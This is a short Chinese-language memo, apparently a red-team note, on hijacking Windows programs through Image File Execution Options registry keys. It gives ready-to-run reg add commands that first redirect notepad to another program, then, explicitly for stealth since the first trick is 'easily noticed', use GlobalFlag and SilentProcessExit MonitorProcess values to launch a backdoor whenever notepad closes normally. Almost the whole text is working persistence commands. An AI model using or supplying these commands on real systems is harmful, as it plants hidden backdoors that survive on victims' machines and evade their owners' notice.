目录

映像位置:

测试：执行 notepad 成 cmd

配合GlobalFlag隐藏-->执行正常关闭后触发 

---

映像位置:

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe

---

测试：执行 notepad 成 cmd

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"

----发现运行notepad变成了calc.

(容易被发现,怀疑啊)

---

配合GlobalFlag隐藏-->执行正常关闭后触发 

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 
		                                                                           要劫持的镜像																	
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 
		                                                                    要劫持的镜像																
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "后门路径"                                             
                                                                    要劫持的镜像
			

--运行notepad正常的同时,后门也会运行. 

---